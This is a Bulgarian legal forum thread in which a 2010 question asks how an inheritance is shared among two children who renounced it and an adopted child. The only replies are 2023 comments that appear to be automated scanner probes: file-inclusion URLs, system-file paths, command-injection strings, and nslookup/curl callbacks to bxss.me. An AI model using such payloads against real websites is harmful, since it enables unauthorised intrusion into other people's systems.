определяне на наследствен дял

03.06.2010г. 01:40:41
'А 'получава като наследство 10д-ка ниви, жени се за 'Б' през 1940г. и имат 2 деца('В' и' Г') в последствие 'А' осиновява 'Д'(пълно осиновяване) без 'Б' да я осиновява. през 1987г. 'А' почива и 'В' и 'Г' правят отказ от наследство от 'А'. през 1998 'Б' почива. какви са наследствените дялове съответно на 'В','Г' и 'Д'?

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:23
Http://bxss.me/t/fit.txt
lxbfYeaa
05.10.2023г. 07:23
http://bxss.me/t/fit.txt?.jpg
lxbfYeaa
05.10.2023г. 07:23
/etc/shells
lxbfYeaa
05.10.2023г. 07:23
c:/windows/win.ini
lxbfYeaa
05.10.2023г. 07:23
bxss.me
lxbfYeaa
05.10.2023г. 07:23
echo mcazwr$()\ odxwrh\nz^xyu||a #' &echo mcazwr$()\ odxwrh\nz^xyu||a #|" &echo mcazwr$()\ odxwrh\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:23
&echo kqdobv$()\ kktdtr\nz^xyu||a #' &echo kqdobv$()\ kktdtr\nz^xyu||a #|" &echo kqdobv$()\ kktdtr\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:23
|echo yklwpq$()\ rmvjpg\nz^xyu||a #' |echo yklwpq$()\ rmvjpg\nz^xyu||a #|" |echo yklwpq$()\ rmvjpg\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:23
(nslookup -q=cname hittrrzvexlvoa2ce3.bxss.me||curl hittrrzvexlvoa2ce3.bxss.me))
lxbfYeaa
05.10.2023г. 07:23
$(nslookup -q=cname hitixvcxwyjolad3dc.bxss.me||curl hitixvcxwyjolad3dc.bxss.me)

Коментар